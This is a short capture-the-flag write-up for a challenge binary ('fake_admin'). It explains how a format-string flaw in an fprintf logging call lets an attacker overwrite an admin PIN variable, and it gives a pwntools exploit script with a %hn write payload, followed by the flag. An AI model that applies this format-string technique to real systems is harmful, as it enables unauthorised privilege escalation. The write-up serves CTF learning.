Try to bypass our authorization system...
nc 24081
The binary lets you write messages, but read messages only when you are an admin. To become an admin, you have to set the variable admin_pin = 0x133713371338
, without having a normal way to do that. But when writing a message, fprintf
is used to log a message to a file. This can be exploited by inputting a specially crafted format string that modifies the value. Then you can read all the messages that were appended to log file located at /tmp/logfile.log
and the flag.
Exploit script:
from pwn import *
p = process('fake_admin')
p.sendline('%4916x %19$hn' + p64(0x6020B8))
print p.recv()
flag: paseca{f0rm4t_str1ng_ag4in}